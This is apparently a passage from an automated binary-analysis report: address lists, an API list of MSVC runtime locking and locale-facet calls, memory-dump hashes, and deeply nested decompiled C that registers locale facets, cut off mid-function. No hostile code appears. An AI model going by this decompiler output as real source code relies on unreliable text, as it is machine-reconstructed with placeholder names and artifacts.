                                                                                                0x00f87942
                                                                                                0x00f8794e
                                                                                                0x00f878fc
                                                                                                0x00f878fc
                                                                                                0x00f878fe
                                                                                                0x00f87904
                                                                                                0x00f8790a
                                                                                                0x00f87912
                                                                                                0x00f87915
                                                                                                0x00f8794f
                                                                                                0x00f87954
                                                                                                0x00f87955
                                                                                                0x00f8795c
                                                                                                0x00f87966
                                                                                                0x00f8796b
                                                                                                0x00f87976
                                                                                                0x00f8797a
                                                                                                0x00f8798b
                                                                                                0x00f8798d
                                                                                                0x00f8798f
                                                                                                0x00f879d4
                                                                                                0x00f879d7
                                                                                                0x00f879e3
                                                                                                0x00f87991
                                                                                                0x00f87991
                                                                                                0x00f87993
                                                                                                0x00f87999
                                                                                                0x00f8799f
                                                                                                0x00f879a7
                                                                                                0x00f879aa
                                                                                                0x00f879e4
                                                                                                0x00f879e9
                                                                                                0x00f879ea
                                                                                                0x00f879f1
                                                                                                0x00f879fb
                                                                                                0x00f87a00
                                                                                                0x00f87a0b
                                                                                                0x00f87a0f
                                                                                                0x00f87a20
                                                                                                0x00f87a22
                                                                                                0x00f87a24
                                                                                                0x00f87a69
                                                                                                0x00f87a6c
                                                                                                0x00f87a78
                                                                                                0x00f87a26
                                                                                                0x00f87a26
                                                                                                0x00f87a28
                                                                                                0x00f87a2e
                                                                                                0x00f87a34
                                                                                                0x00f87a35
                                                                                                0x00f87a3b
                                                                                                0x00f87a3c
                                                                                                0x00f87a3f
                                                                                                0x00f87a79
                                                                                                0x00f87a7e
                                                                                                0x00f87a82
                                                                                                0x00f87a86
                                                                                                0x00f87a8a
                                                                                                0x00f87a8a
                                                                                                0x00f87a8a
                                                                                                0x00f87a8e
                                                                                                0x00f87a95
                                                                                                0x00f87a98
                                                                                                0x00f87aa1
                                                                                                0x00f87a41
                                                                                                0x00f87a41
                                                                                                0x00f87a44
                                                                                                0x00f87a48
                                                                                                0x00f87a4c
                                                                                                0x00f87a59
                                                                                                0x00f87a61
                                                                                                0x00f87a63
                                                                                                0x00000000
                                                                                                0x00f87a63
                                                                                                0x00f87a2a
                                                                                                0x00f87a2a
                                                                                                0x00000000
                                                                                                0x00f87a2a
                                                                                                0x00f87a28
                                                                                                0x00f879ac
                                                                                                0x00f879ac
                                                                                                0x00f879af
                                                                                                0x00f879b3
                                                                                                0x00f879b7
                                                                                                0x00f879c4
                                                                                                0x00f879cc
                                                                                                0x00f879ce
                                                                                                0x00000000
                                                                                                0x00f879ce
                                                                                                0x00f87995
                                                                                                0x00f87995
                                                                                                0x00000000
                                                                                                0x00f87995
                                                                                                0x00f87993
                                                                                                0x00f87917
                                                                                                0x00f87917
                                                                                                0x00f8791a
                                                                                                0x00f8791e
                                                                                                0x00f87922
                                                                                                0x00f8792f
                                                                                                0x00f87937
                                                                                                0x00f87939
                                                                                                0x00000000
                                                                                                0x00f87939
                                                                                                0x00f87900
                                                                                                0x00f87900
                                                                                                0x00000000
                                                                                                0x00f87900
                                                                                                0x00f878fe
                                                                                                0x00f87882
                                                                                                0x00f87882
                                                                                                0x00f87885
                                                                                                0x00f87889
                                                                                                0x00f8788d
                                                                                                0x00f8789a
                                                                                                0x00f878a2
                                                                                                0x00f878a4
                                                                                                0x00000000
                                                                                                0x00f878a4
                                                                                                0x00f8786b
                                                                                                0x00f8786b
                                                                                                0x00000000
                                                                                                0x00f8786b
                                                                                                0x00f87869
                                                                                                0x00f877ed
                                                                                                0x00f877ed
                                                                                                0x00f877f0
                                                                                                0x00f877f4
                                                                                                0x00f877f8
                                                                                                0x00f87805
                                                                                                0x00f8780d
                                                                                                0x00f8780f
                                                                                                0x00000000
                                                                                                0x00f8780f
                                                                                                0x00f877d6
                                                                                                0x00f877d6
                                                                                                0x00000000
                                                                                                0x00f877d6
                                                                                                0x00f877d4
                                                                                                0x00f87758
                                                                                                0x00f87758
                                                                                                0x00f8775b
                                                                                                0x00f8775f
                                                                                                0x00f87763
                                                                                                0x00f87770
                                                                                                0x00f87778
                                                                                                0x00f8777a
                                                                                                0x00000000
                                                                                                0x00f8777a
                                                                                                0x00f87741
                                                                                                0x00f87741
                                                                                                0x00000000
                                                                                                0x00f87741
                                                                                                0x00f8773f
                                                                                                0x00f876c3
                                                                                                0x00f876c3
                                                                                                0x00f876c6
                                                                                                0x00f876ca
                                                                                                0x00f876ce
                                                                                                0x00f876db
                                                                                                0x00f876e3
                                                                                                0x00f876e5
                                                                                                0x00000000
                                                                                                0x00f876e5
                                                                                                0x00f876ac
                                                                                                0x00f876ac
                                                                                                0x00000000
                                                                                                0x00f876ac
                                                                                                0x00f876aa
                                                                                                0x00f8762e
                                                                                                0x00f8762e
                                                                                                0x00f87631
                                                                                                0x00f87635
                                                                                                0x00f87639
                                                                                                0x00f87646
                                                                                                0x00f8764e
                                                                                                0x00f87650
                                                                                                0x00000000
                                                                                                0x00f87650
                                                                                                0x00f87617
                                                                                                0x00f87617
                                                                                                0x00000000
                                                                                                0x00f87617
                                                                                                0x00f87615
                                                                                                0x00f87599
                                                                                                0x00f87599
                                                                                                0x00f8759c
                                                                                                0x00f875a0
                                                                                                0x00f875a4
                                                                                                0x00f875b1
                                                                                                0x00f875b9
                                                                                                0x00f875bb
                                                                                                0x00000000
                                                                                                0x00f875bb
                                                                                                0x00f87582
                                                                                                0x00f87582
                                                                                                0x00000000
                                                                                                0x00f87582
                                                                                                0x00f87580
                                                                                                0x00f87504
                                                                                                0x00f87504
                                                                                                0x00f87507
                                                                                                0x00f8750b
                                                                                                0x00f8750f
                                                                                                0x00f8751c
                                                                                                0x00f87524
                                                                                                0x00f87526
                                                                                                0x00000000
                                                                                                0x00f87526
                                                                                                0x00f874ed
                                                                                                0x00f874ed
                                                                                                0x00000000
                                                                                                0x00f874ed
                                                                                                0x00f874eb
                                                                                                0x00f8746f
                                                                                                0x00f8746f
                                                                                                0x00f87472
                                                                                                0x00f87476
                                                                                                0x00f8747a
                                                                                                0x00f87487
                                                                                                0x00f8748f
                                                                                                0x00f87491
                                                                                                0x00000000
                                                                                                0x00f87491
                                                                                                0x00f87458
                                                                                                0x00f87458
                                                                                                0x00000000
                                                                                                0x00f87458
                                                                                                0x00f87456
                                                                                                0x00f873da
                                                                                                0x00f873da
                                                                                                0x00f873dd
                                                                                                0x00f873e1
                                                                                                0x00f873e5
                                                                                                0x00f873f2
                                                                                                0x00f873fa
                                                                                                0x00f873fc
                                                                                                0x00000000
                                                                                                0x00f873fc
                                                                                                0x00f873c3
                                                                                                0x00f873c3
                                                                                                0x00000000
                                                                                                0x00f873c3
                                                                                                0x00f873c1
                                                                                                0x00f87345
                                                                                                0x00f87345
                                                                                                0x00f87348
                                                                                                0x00f8734c
                                                                                                0x00f87350
                                                                                                0x00f8735d
                                                                                                0x00f87365
                                                                                                0x00f87367
                                                                                                0x00000000
                                                                                                0x00f87367
                                                                                                0x00f8732e
                                                                                                0x00f8732e
                                                                                                0x00000000
                                                                                                0x00f8732e
                                                                                                0x00f8732c
                                                                                                0x00f872b0
                                                                                                0x00f872b0
                                                                                                0x00f872b3
                                                                                                0x00f872b7
                                                                                                0x00f872bb
                                                                                                0x00f872c8
                                                                                                0x00f872d0
                                                                                                0x00f872d2
                                                                                                0x00000000
                                                                                                0x00f872d2
                                                                                                0x00f87299
                                                                                                0x00f87299
                                                                                                0x00000000
                                                                                                0x00f87299
                                                                                                0x00f87297
                                                                                                0x00f8721b
                                                                                                0x00f8721b
                                                                                                0x00f8721e
                                                                                                0x00f87222
                                                                                                0x00f87226
                                                                                                0x00f87233
                                                                                                0x00f8723b
                                                                                                0x00f8723d
                                                                                                0x00000000
                                                                                                0x00f8723d
                                                                                                0x00f87204
                                                                                                0x00f87204
                                                                                                0x00000000
                                                                                                0x00f87204
                                                                                                0x00f87202

                                                                                                APIs
                                                                                                • __EH_prolog3.LIBCMT ref: 00F871CB
                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00F871D5
                                                                                                  • Part of subcall function 00F789D0: std::_Lockit::_Lockit.LIBCPMT ref: 00F78A00
                                                                                                  • Part of subcall function 00F789D0: std::_Lockit::~_Lockit.LIBCPMT ref: 00F78A28
                                                                                                • messages.LIBCPMT ref: 00F8720F
                                                                                                • std::_Facet_Register.LIBCPMT ref: 00F87226
                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00F87246
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.327941628.0000000000F71000.00000020.00020000.sdmp, Offset: 00F70000, based on PE: true
                                                                                                • Associated: 0000000E.00000002.327936467.0000000000F70000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.327980112.0000000000FB8000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328006358.0000000000FCF000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328015005.0000000000FD3000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermessages
                                                                                                • String ID:
                                                                                                • API String ID: 2750803064-0
                                                                                                • Opcode ID: d11aa9acc414d39fb42e5be6ff9a450faeb2dae200bde493980dbfeb51d3ce29
                                                                                                • Instruction ID: 5f0963beab427ab6c79036e93c0cbf96a858fa066bc512a2f588fdcdef76bf3f
                                                                                                • Opcode Fuzzy Hash: d11aa9acc414d39fb42e5be6ff9a450faeb2dae200bde493980dbfeb51d3ce29
                                                                                                • Instruction Fuzzy Hash: B401A1359042199BCB05FB64CC457EE77A2AF84760F64410AF41567292DF78DE02AB92
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 71%
                                                                                                			E00F8712F(void* __edi, void* __esi, void* __eflags, intOrPtr _a8) {
                                                                                                				signed int _v4;
                                                                                                				signed int _v16;
                                                                                                				char _v20;
                                                                                                				intOrPtr _v60;
                                                                                                				signed int _t201;
                                                                                                				void* _t371;
                                                                                                				short* _t535;
                                                                                                				void* _t584;
                                                                                                				signed int _t587;
                                                                                                				signed int _t588;
                                                                                                				signed int _t589;
                                                                                                				signed int _t590;
                                                                                                				signed int _t591;
                                                                                                				signed int _t592;
                                                                                                				signed int _t593;
                                                                                                				signed int _t594;
                                                                                                				signed int _t595;
                                                                                                				signed int _t596;
                                                                                                				signed int _t597;
                                                                                                				signed int _t598;
                                                                                                				signed int _t599;
                                                                                                				signed int _t600;
                                                                                                				signed int _t601;
                                                                                                				signed int _t603;
                                                                                                				signed int _t604;
                                                                                                				signed int _t605;
                                                                                                				signed int _t606;
                                                                                                				signed int _t607;
                                                                                                				signed int _t608;
                                                                                                				signed int _t609;
                                                                                                				signed int _t610;
                                                                                                				signed int _t611;
                                                                                                				signed int _t612;
                                                                                                				signed int _t613;
                                                                                                				signed int _t614;
                                                                                                				signed int _t615;
                                                                                                				signed int _t616;
                                                                                                				signed int _t617;
                                                                                                				signed int _t618;
                                                                                                				short* _t619;
                                                                                                
                                                                                                				_push(8);
                                                                                                				E00FB38B2(0xfb6ebe, __edi, __esi);
                                                                                                				E00F856E6( &_v20, 0);
                                                                                                				_t603 =  *0xfd0b04; // 0x0
                                                                                                				_v4 = _v4 & 0x00000000;
                                                                                                				_v16 = _t603;
                                                                                                				_t201 = E00F78A40(_a8, E00F789D0());
                                                                                                				_t586 = _t201;
                                                                                                				if(_t201 != 0) {
                                                                                                					L5:
                                                                                                					E00F8573E( &_v20);
                                                                                                					return E00FB388C(_t586);
                                                                                                				} else {
                                                                                                					if(_t603 == 0) {
                                                                                                						_push(_a8);
                                                                                                						_push( &_v16);
                                                                                                						__eflags = E00F885EC(_t586, _t603, __eflags) - 0xffffffff;
                                                                                                						if(__eflags == 0) {
                                                                                                							E00F78FE0(__eflags);
                                                                                                							asm("int3");
                                                                                                							_push(8);
                                                                                                							E00FB38B2(0xfb6ebe, _t586, _t603);
                                                                                                							E00F856E6( &_v20, 0);
                                                                                                							_t604 =  *0xfd0ad4; // 0x0
                                                                                                							_v4 = _v4 & 0x00000000;
                                                                                                							_v16 = _t604;
                                                                                                							_t587 = E00F78A40(_a8, E00F789D0());
                                                                                                							__eflags = _t587;
                                                                                                							if(_t587 != 0) {
                                                                                                								L12:
                                                                                                								E00F8573E( &_v20);
                                                                                                								return E00FB388C(_t587);
                                                                                                							} else {
                                                                                                								__eflags = _t604;
                                                                                                								if(__eflags == 0) {
                                                                                                									_push(_a8);
                                                                                                									_push( &_v16);
                                                                                                									__eflags = E00F88654(_t587, _t604, __eflags) - 0xffffffff;
                                                                                                									if(__eflags == 0) {
                                                                                                										E00F78FE0(__eflags);
                                                                                                										asm("int3");
                                                                                                										_push(8);
                                                                                                										E00FB38B2(0xfb6ebe, _t587, _t604);
                                                                                                										E00F856E6( &_v20, 0);
                                                                                                										_t605 =  *0xfd0b08; // 0x0
                                                                                                										_v4 = _v4 & 0x00000000;
                                                                                                										_v16 = _t605;
                                                                                                										_t588 = E00F78A40(_a8, E00F789D0());
                                                                                                										__eflags = _t588;
                                                                                                										if(_t588 != 0) {
                                                                                                											L19:
                                                                                                											E00F8573E( &_v20);
                                                                                                											return E00FB388C(_t588);
                                                                                                										} else {
                                                                                                											__eflags = _t605;
                                                                                                											if(__eflags == 0) {
                                                                                                												_push(_a8);
                                                                                                												_push( &_v16);
                                                                                                												__eflags = E00F886BC(_t588, _t605, __eflags) - 0xffffffff;
                                                                                                												if(__eflags == 0) {
                                                                                                													E00F78FE0(__eflags);
                                                                                                													asm("int3");
                                                                                                													_push(8);
                                                                                                													E00FB38B2(0xfb6ebe, _t588, _t605);
                                                                                                													E00F856E6( &_v20, 0);
                                                                                                													_t606 =  *0xfd0ad8; // 0x0
                                                                                                													_v4 = _v4 & 0x00000000;
                                                                                                													_v16 = _t606;
                                                                                                													_t589 = E00F78A40(_a8, E00F789D0());
                                                                                                													__eflags = _t589;
                                                                                                													if(_t589 != 0) {
                                                                                                														L26:
                                                                                                														E00F8573E( &_v20);
                                                                                                														return E00FB388C(_t589);
                                                                                                													} else {
                                                                                                														__eflags = _t606;
                                                                                                														if(__eflags == 0) {
                                                                                                															_push(_a8);
                                                                                                															_push( &_v16);
                                                                                                															__eflags = E00F88724(_t589, _t606, __eflags) - 0xffffffff;
                                                                                                															if(__eflags == 0) {
                                                                                                																E00F78FE0(__eflags);
                                                                                                																asm("int3");
                                                                                                																_push(8);
                                                                                                																E00FB38B2(0xfb6ebe, _t589, _t606);
                                                                                                																E00F856E6( &_v20, 0);
                                                                                                																_t607 =  *0xfd0b0c; // 0x0
                                                                                                																_v4 = _v4 & 0x00000000;
                                                                                                																_v16 = _t607;
                                                                                                																_t590 = E00F78A40(_a8, E00F789D0());
                                                                                                																__eflags = _t590;
                                                                                                																if(_t590 != 0) {
                                                                                                																	L33:
                                                                                                																	E00F8573E( &_v20);
                                                                                                																	return E00FB388C(_t590);
                                                                                                																} else {
                                                                                                																	__eflags = _t607;
                                                                                                																	if(__eflags == 0) {
                                                                                                																		_push(_a8);
                                                                                                																		_push( &_v16);
                                                                                                																		__eflags = E00F8878C(_t590, _t607, __eflags) - 0xffffffff;
                                                                                                																		if(__eflags == 0) {
                                                                                                																			E00F78FE0(__eflags);
                                                                                                																			asm("int3");
                                                                                                																			_push(8);
                                                                                                																			E00FB38B2(0xfb6ebe, _t590, _t607);
                                                                                                																			E00F856E6( &_v20, 0);
                                                                                                																			_t608 =  *0xfd0adc; // 0x0
                                                                                                																			_v4 = _v4 & 0x00000000;
                                                                                                																			_v16 = _t608;
                                                                                                																			_t591 = E00F78A40(_a8, E00F789D0());
                                                                                                																			__eflags = _t591;
                                                                                                																			if(_t591 != 0) {
                                                                                                																				L40:
                                                                                                																				E00F8573E( &_v20);
                                                                                                																				return E00FB388C(_t591);
                                                                                                																			} else {
                                                                                                																				__eflags = _t608;
                                                                                                																				if(__eflags == 0) {
                                                                                                																					_push(_a8);
                                                                                                																					_push( &_v16);
                                                                                                																					__eflags = E00F887F4(_t591, _t608, __eflags) - 0xffffffff;
                                                                                                																					if(__eflags == 0) {
                                                                                                																						E00F78FE0(__eflags);
                                                                                                																						asm("int3");
                                                                                                																						_push(8);
                                                                                                																						E00FB38B2(0xfb6ebe, _t591, _t608);
                                                                                                																						E00F856E6( &_v20, 0);
                                                                                                																						_t609 =  *0xfd0b14; // 0x0
                                                                                                																						_v4 = _v4 & 0x00000000;
                                                                                                																						_v16 = _t609;
                                                                                                																						_t592 = E00F78A40(_a8, E00F789D0());
                                                                                                																						__eflags = _t592;
                                                                                                																						if(_t592 != 0) {
                                                                                                																							L47:
                                                                                                																							E00F8573E( &_v20);
                                                                                                																							return E00FB388C(_t592);
                                                                                                																						} else {
                                                                                                																							__eflags = _t609;
                                                                                                																							if(__eflags == 0) {
                                                                                                																								_push(_a8);
                                                                                                																								_push( &_v16);
                                                                                                																								__eflags = E00F8885C(_t592, _t609, __eflags) - 0xffffffff;
                                                                                                																								if(__eflags == 0) {
                                                                                                																									E00F78FE0(__eflags);
                                                                                                																									asm("int3");
                                                                                                																									_push(8);
                                                                                                																									E00FB38B2(0xfb6ebe, _t592, _t609);
                                                                                                																									E00F856E6( &_v20, 0);
                                                                                                																									_t610 =  *0xfd0b10; // 0x0
                                                                                                																									_v4 = _v4 & 0x00000000;
                                                                                                																									_v16 = _t610;
                                                                                                																									_t593 = E00F78A40(_a8, E00F789D0());
                                                                                                																									__eflags = _t593;
                                                                                                																									if(_t593 != 0) {
                                                                                                																										L54:
                                                                                                																										E00F8573E( &_v20);
                                                                                                																										return E00FB388C(_t593);
                                                                                                																									} else {
                                                                                                																										__eflags = _t610;
                                                                                                																										if(__eflags == 0) {
                                                                                                																											_push(_a8);
                                                                                                																											_push( &_v16);
                                                                                                																											__eflags = E00F888E0(_t593, _t610, __eflags) - 0xffffffff;
                                                                                                																											if(__eflags == 0) {
                                                                                                																												E00F78FE0(__eflags);
                                                                                                																												asm("int3");
                                                                                                																												_push(8);
                                                                                                																												E00FB38B2(0xfb6ebe, _t593, _t610);
                                                                                                																												E00F856E6( &_v20, 0);
                                                                                                																												_t611 =  *0xfd0ae4; // 0x0
                                                                                                																												_v4 = _v4 & 0x00000000;
                                                                                                																												_v16 = _t611;
                                                                                                																												_t594 = E00F78A40(_a8, E00F789D0());
                                                                                                																												__eflags = _t594;
                                                                                                																												if(_t594 != 0) {
                                                                                                																													L61:
                                                                                                																													E00F8573E( &_v20);
                                                                                                																													return E00FB388C(_t594);
                                                                                                																												} else {
                                                                                                																													__eflags = _t611;
                                                                                                																													if(__eflags == 0) {
                                                                                                																														_push(_a8);
                                                                                                																														_push( &_v16);
                                                                                                																														__eflags = E00F88965(_t594, _t611, __eflags) - 0xffffffff;
                                                                                                																														if(__eflags == 0) {
                                                                                                																															E00F78FE0(__eflags);
                                                                                                																															asm("int3");
                                                                                                																															_push(8);
                                                                                                																															E00FB38B2(0xfb6ebe, _t594, _t611);
                                                                                                																															E00F856E6( &_v20, 0);
                                                                                                																															_t612 =  *0xfd0ae0; // 0x0
                                                                                                																															_v4 = _v4 & 0x00000000;
                                                                                                																															_v16 = _t612;
                                                                                                																															_t595 = E00F78A40(_a8, E00F789D0());
                                                                                                																															__eflags = _t595;
                                                                                                																															if(_t595 != 0) {
                                                                                                																																L68:
                                                                                                																																E00F8573E( &_v20);
                                                                                                																																return E00FB388C(_t595);
                                                                                                																															} else {
                                                                                                																																__eflags = _t612;
                                                                                                																																if(__eflags == 0) {
                                                                                                																																	_push(_a8);
                                                                                                																																	_push( &_v16);
                                                                                                																																	__eflags = E00F889E9(_t595, _t612, __eflags) - 0xffffffff;
                                                                                                																																	if(__eflags == 0) {
                                                                                                																																		E00F78FE0(__eflags);
                                                                                                																																		asm("int3");
                                                                                                																																		_push(8);
                                                                                                																																		E00FB38B2(0xfb6ebe, _t595, _t612);
                                                                                                																																		E00F856E6( &_v20, 0);
                                                                                                																																		_t613 =  *0xfd0af4; // 0x0
                                                                                                																																		_v4 = _v4 & 0x00000000;
                                                                                                																																		_v16 = _t613;
                                                                                                																																		_t596 = E00F78A40(_a8, E00F789D0());
                                                                                                																																		__eflags = _t596;
                                                                                                																																		if(_t596 != 0) {
                                                                                                																																			L75:
                                                                                                																																			E00F8573E( &_v20);
                                                                                                																																			return E00FB388C(_t596);
                                                                                                																																		} else {
                                                                                                																																			__eflags = _t613;
                                                                                                																																			if(__eflags == 0) {
                                                                                                																																				_push(_a8);
                                                                                                																																				_push( &_v16);
                                                                                                																																				__eflags = E00F88A6E(_t596, _t613, __eflags) - 0xffffffff;
                                                                                                																																				if(__eflags == 0) {
                                                                                                																																					E00F78FE0(__eflags);
                                                                                                																																					asm("int3");
                                                                                                																																					_push(8);
                                                                                                																																					E00FB38B2(0xfb6ebe, _t596, _t613);
                                                                                                																																					E00F856E6( &_v20, 0);
                                                                                                																																					_t614 =  *0xfd0af8; // 0x0
                                                                                                																																					_v4 = _v4 & 0x00000000;
                                                                                                																																					_v16 = _t614;
                                                                                                																																					_t597 = E00F78A40(_a8, E00F789D0());
                                                                                                																																					__eflags = _t597;
                                                                                                																																					if(_t597 != 0) {
                                                                                                																																						L82:
                                                                                                																																						E00F8573E( &_v20);
                                                                                                																																						return E00FB388C(_t597);
                                                                                                																																					} else {
                                                                                                																																						__eflags = _t614;
                                                                                                																																						if(__eflags == 0) {
                                                                                                																																							_push(_a8);
                                                                                                																																							_push( &_v16);
                                                                                                																																							__eflags = E00F88AD6(_t597, _t614, __eflags) - 0xffffffff;
                                                                                                																																							if(__eflags == 0) {
                                                                                                																																								E00F78FE0(__eflags);
                                                                                                																																								asm("int3");
                                                                                                																																								_push(8);
                                                                                                																																								E00FB38B2(0xfb6ebe, _t597, _t614);
                                                                                                																																								E00F856E6( &_v20, 0);
                                                                                                																																								_t615 =  *0xfd0afc; // 0x0
                                                                                                																																								_v4 = _v4 & 0x00000000;
                                                                                                																																								_v16 = _t615;
                                                                                                																																								_t598 = E00F78A40(_a8, E00F789D0());
                                                                                                																																								__eflags = _t598;
                                                                                                																																								if(_t598 != 0) {
                                                                                                																																									L89:
                                                                                                																																									E00F8573E( &_v20);
                                                                                                																																									return E00FB388C(_t598);
                                                                                                																																								} else {
                                                                                                																																									__eflags = _t615;
                                                                                                																																									if(__eflags == 0) {
                                                                                                																																										_push(_a8);
                                                                                                																																										_push( &_v16);
                                                                                                																																										__eflags = E00F88B3E(_t584, _t598, _t615, __eflags) - 0xffffffff;
                                                                                                																																										if(__eflags == 0) {
                                                                                                																																											E00F78FE0(__eflags);
                                                                                                																																											asm("int3");
                                                                                                																																											_push(8);
                                                                                                																																											E00FB38B2(0xfb6ebe, _t598, _t615);
                                                                                                																																											E00F856E6( &_v20, 0);
                                                                                                																																											_t616 =  *0xfd0b18; // 0x0
                                                                                                																																											_v4 = _v4 & 0x00000000;
                                                                                                																																											_v16 = _t616;
                                                                                                																																											_t599 = E00F78A40(_a8, E00F789D0());
                                                                                                																																											__eflags = _t599;
                                                                                                																																											if(_t599 != 0) {
                                                                                                																																												L96:
                                                                                                																																												E00F8573E( &_v20);
                                                                                                																																												return E00FB388C(_t599);
                                                                                                																																											} else {
                                                                                                																																												__eflags = _t616;
                                                                                                																																												if(__eflags == 0) {
                                                                                                																																													_push(_a8);
                                                                                                																																													_push( &_v16);
                                                                                                																																													__eflags = E00F88BB9(_t599, _t616, __eflags) - 0xffffffff;
                                                                                                																																													if(__eflags == 0) {
                                                                                                																																														E00F78FE0(__eflags);
                                                                                                																																														asm("int3");
                                                                                                																																														_push(8);
                                                                                                																																														E00FB38B2(0xfb6ebe, _t599, _t616);
                                                                                                																																														E00F856E6( &_v20, 0);
                                                                                                																																														_t617 =  *0xfd0ae8; // 0x0
                                                                                                																																														_v4 = _v4 & 0x00000000;
                                                                                                																																														_v16 = _t617;
                                                                                                																																														_t600 = E00F78A40(_a8, E00F789D0());
                                                                                                																																														__eflags = _t600;
                                                                                                																																														if(_t600 != 0) {
                                                                                                																																															L103:
                                                                                                																																															E00F8573E( &_v20);
                                                                                                																																															return E00FB388C(_t600);
                                                                                                																																														} else {
                                                                                                																																															__eflags = _t617;
                                                                                                																																															if(__eflags == 0) {
                                                                                                																																																_push(_a8);
                                                                                                																																																_push( &_v16);
                                                                                                																																																__eflags = E00F88C25(_t600, _t617, __eflags) - 0xffffffff;
                                                                                                																																																if(__eflags == 0) {
                                                                                                																																																	E00F78FE0(__eflags);
                                                                                                																																																	asm("int3");
                                                                                                																																																	_push(8);
                                                                                                																																																	E00FB38B2(0xfb6ebe, _t600, _t617);
                                                                                                																																																	E00F856E6( &_v20, 0);
                                                                                                																																																	_t618 =  *0xfd0b1c; // 0x0
                                                                                                																																																	_v4 = _v4 & 0x00000000;
                                                                                                																																																	_v16 = _t618;
                                                                                                																																																	_t601 = E00F78A40(_a8, E00F789D0());
                                                                                                																																																	__eflags = _t601;
                                                                                                																																																	if(_t601 != 0) {
                                                                                                																																																		L110:
                                                                                                																																																		E00F8573E( &_v20);
                                                                                                																																																		return E00FB388C(_t601);
                                                                                                																																																	} else {
                                                                                                																																																		__eflags = _t618;
                                                                                                																																																		if(__eflags == 0) {
                                                                                                																																																			_push(_a8);
                                                                                                																																																			_push( &_v16);
                                                                                                																																																			_t371 = E00F88C91(_t601, _t618, __eflags);
                                                                                                																																																			_pop(_t535);
                                                                                                																																																			__eflags = _t371 - 0xffffffff;
                                                                                                																																																			if(__eflags == 0) {
                                                                                                																																																				E00F78FE0(__eflags);
                                                                                                																																																				asm("int3");
                                                                                                																																																				_push(_t618);
                                                                                                																																																				_t619 = _t535;
                                                                                                																																																				_t194 = _t619 + 0x10;
                                                                                                																																																				 *_t194 =  *(_t619 + 0x10) & 0x00000000;
                                                                                                																																																				__eflags =  *_t194;
                                                                                                																																																				 *((intOrPtr*)(_t619 + 0x14)) = 7;
                                                                                                																																																				 *_t619 = 0;
                                                                                                																																																				E00F8D9F3(_v60);
                                                                                                																																																				return _t619;
                                                                                                																																																			} else {
                                                                                                																																																				_t601 = _v16;
                                                                                                																																																				_v16 = _t601;
                                                                                                																																																				_v4 = 1;
                                                                                                																																																				E00F85472(_t601);
                                                                                                																																																				 *0xfb81fc();
                                                                                                																																																				 *((intOrPtr*)( *((intOrPtr*)( *_t601 + 4))))();
                                                                                                																																																				 *0xfd0b1c = _t601;
                                                                                                																																																				goto L110;
                                                                                                																																																			}
                                                                                                																																																		} else {
                                                                                                																																																			_t601 = _t618;
                                                                                                																																																			goto L110;
                                                                                                																																																		}
                                                                                                																																																	}
                                                                                                																																																} else {
                                                                                                																																																	_t600 = _v16;
                                                                                                																																																	_v16 = _t600;
                                                                                                																																																	_v4 = 1;
                                                                                                																																																	E00F85472(_t600);
                                                                                                																																																	 *0xfb81fc();
                                                                                                																																																	 *((intOrPtr*)( *((intOrPtr*)( *_t600 + 4))))();
                                                                                                																																																	 *0xfd0ae8 = _t600;
                                                                                                																																																	goto L103;
                                                                                                																																																}
                                                                                                																																															} else {
                                                                                                																																																_t600 = _t617;
                                                                                                																																																goto L103;
                                                                                                																																															}
                                                                                                																																														}
                                                                                                																																													} else {
                                                                                                																																														_t599 = _v16;
                                                                                                																																														_v16 = _t599;
                                                                                                																																														_v4 = 1;
                                                                                                																																														E00F85472(_t599);
                                                                                                																																														 *0xfb81fc();
                                                                                                																																														 *((intOrPtr*)( *((intOrPtr*)( *_t599 + 4))))();
                                                                                                																																														 *0xfd0b18 = _t599;
                                                                                                																																														goto L96;
                                                                                                																																													}
                                                                                                																																												} else {
                                                                                                																																													_t599 = _t616;
                                                                                                																																													goto L96;
                                                                                                																																												}
                                                                                                																																											}
                                                                                                																																										} else {
                                                                                                																																											_t598 = _v16;
                                                                                                																																											_v16 = _t598;
                                                                                                																																											_v4 = 1;
                                                                                                																																											E00F85472(_t598);
                                                                                                																																											 *0xfb81fc();
                                                                                                																																											 *((intOrPtr*)( *((intOrPtr*)( *_t598 + 4))))();
                                                                                                																																											 *0xfd0afc = _t598;
                                                                                                																																											goto L89;
                                                                                                																																										}
                                                                                                																																									} else {
                                                                                                																																										_t598 = _t615;
                                                                                                																																										goto L89;
                                                                                                																																									}
                                                                                                																																								}
                                                                                                																																							} else {
                                                                                                																																								_t597 = _v16;
                                                                                                																																								_v16 = _t597;
                                                                                                																																								_v4 = 1;
                                                                                                																																								E00F85472(_t597);
                                                                                                																																								 *0xfb81fc();
                                                                                                																																								 *((intOrPtr*)( *((intOrPtr*)( *_t597 + 4))))();
                                                                                                																																								 *0xfd0af8 = _t597;
                                                                                                																																								goto L82;
                                                                                                																																							}
                                                                                                																																						} else {
                                                                                                																																							_t597 = _t614;
                                                                                                																																							goto L82;
                                                                                                																																						}
                                                                                                																																					}
                                                                                                																																				} else {
                                                                                                																																					_t596 = _v16;
                                                                                                																																					_v16 = _t596;
                                                                                                																																					_v4 = 1;
                                                                                                																																					E00F85472(_t596);
                                                                                                																																					 *0xfb81fc();
                                                                                                																																					 *((intOrPtr*)( *((intOrPtr*)( *_t596 + 4))))();
                                                                                                																																					 *0xfd0af4 = _t596;
                                                                                                																																					goto L75;
                                                                                                																																				}
                                                                                                																																			} else {
                                                                                                																																				_t596 = _t613;
                                                                                                																																				goto L75;
                                                                                                																																			}
                                                                                                																																		}
                                                                                                																																	} else {
                                                                                                																																		_t595 = _v16;
                                                                                                																																		_v16 = _t595;
                                                                                                																																		_v4 = 1;
                                                                                                																																		E00F85472(_t595);
                                                                                                																																		 *0xfb81fc();
                                                                                                																																		 *((intOrPtr*)( *((intOrPtr*)( *_t595 + 4))))();
                                                                                                																																		 *0xfd0ae0 = _t595;
                                                                                                																																		goto L68;
                                                                                                																																	}
                                                                                                																																} else {
                                                                                                																																	_t595 = _t612;
                                                                                                																																	goto L68;
                                                                                                																																}
                                                                                                																															}
